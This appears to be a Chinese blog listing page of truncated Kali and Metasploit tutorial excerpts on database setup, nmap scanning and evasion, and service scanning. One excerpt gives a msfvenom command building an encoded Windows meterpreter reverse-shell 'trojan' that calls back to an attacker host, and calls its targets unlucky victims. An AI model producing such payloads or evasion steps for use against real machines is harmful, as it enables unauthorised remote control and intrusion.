Metaspoit
头发太多了
梵歆
这个作者很懒,什么都没留下…
展开
-
kali->使用Metaspoit制作木马
首先,我们要先知道木马的使用过程,然后我们才能制作出木马木马:控制端(我们)被控制端(倒霉蛋们)虚拟机的kali打开终端使用msfvenom -p命令来制作(因为我用的是kali2.0所以和1.0的版本不一样)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192原创 2017-07-28 20:25:58 · 16153 阅读 · 3 评论 -
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之postgresql数据库
这个软件我之后会简称为MSF,他继承在Kali中。关于POSTGRESQL数据库在使用数据库的时候,我们首先要下载数据库apt-get install postgresql apt-get install pgadmin3 图形化我们就要打开数据库服务service postgresql start数据库初始化msfdb init开启和关闭msfdb st...原创 2019-08-18 16:48:31 · 233 阅读 · 0 评论 -
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之基本操作
通过学习msf期间,主要是针对浏览器,操作系统,系统应用之类的漏洞利用,大家要多多留意各大安全平台的最新漏洞提醒,也要学会如何查找对应的漏洞利用。在我们把postgresql数据库配置完成之后在kali中输入msfconsole进入到工具中我们查看有哪些攻击载荷show exploits如何查看我们所需要的漏洞名使用search 漏洞编号然后就可以...原创 2019-08-19 08:29:40 · 237 阅读 · 0 评论 -
Kali -> nmap
主动信息收集nmap工具主要主机发现 端口扫描 版本侦测 OS侦测nmap几个重要的参数nmap -sn 存活主机 -O 查看操作系统 -sP 在线主机 -sV 端口服务 -A 综合扫描nmap对于防火墙与IDS的规避分片 IP诱骗/伪装 指定源端口 扫描延时 其他技术采用欺骗的方式来进...原创 2019-08-19 09:53:59 · 578 阅读 · 0 评论 -
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之针对性扫描探测
针对Mysql版本扫描use auxiliary/scanner/mysql/mysql_version实例:msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 10.5.65.100RHOSTS => 10.5.65.100msf5 auxiliary(scanner/mysql/mysql_version) ...原创 2019-08-19 10:12:47 · 315 阅读 · 0 评论 -
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之TCP空闲扫描
TCP空闲扫描利用一些僵尸主机的端口来判断IP IDIP ID是累加的,所以只分析最后一个包就可以理论过程:攻击机向僵尸主机发送一个SYN包僵尸主机会响应给攻击机一个RST包,其中rst包中存在IP ID值,IP ID 值是累加的然后攻击机向目标服务器发送一个SYN包,SYN中的信息是僵尸主机的服务器根据SYN包中的信息判断是僵尸主机的地址,响应RST包个给僵尸主机,其中也有一个...原创 2019-08-19 10:22:01 · 213 阅读 · 0 评论 -
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之SSH服务器扫描
SSH服务器扫描ssh协议是经过加密的,比较安全我们要先查看有哪些主机开放22号端口先用nmap -v -oX net1.xml ip段来保存扫描后的文件在msf中保存net1.xmlimport net1.xml然后在msf中使用serivces -p 22 -c name,port,proto 查看主机最后使用ssh/ssh_version模块来查看msf5 > u...原创 2019-08-19 10:53:43 · 167 阅读 · 0 评论 -
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之生成木马
使用msfvenom生成木马查看可以支持windows64位的payloadmsfvenom -l payload | grep x64msfvenom -p 指定payload -f 输出的格式 -e 是编码器 -c 添加一个win32的shellcode显示所有payloadmsfvenm -l payload | more...原创 2019-08-19 14:44:13 · 418 阅读 · 0 评论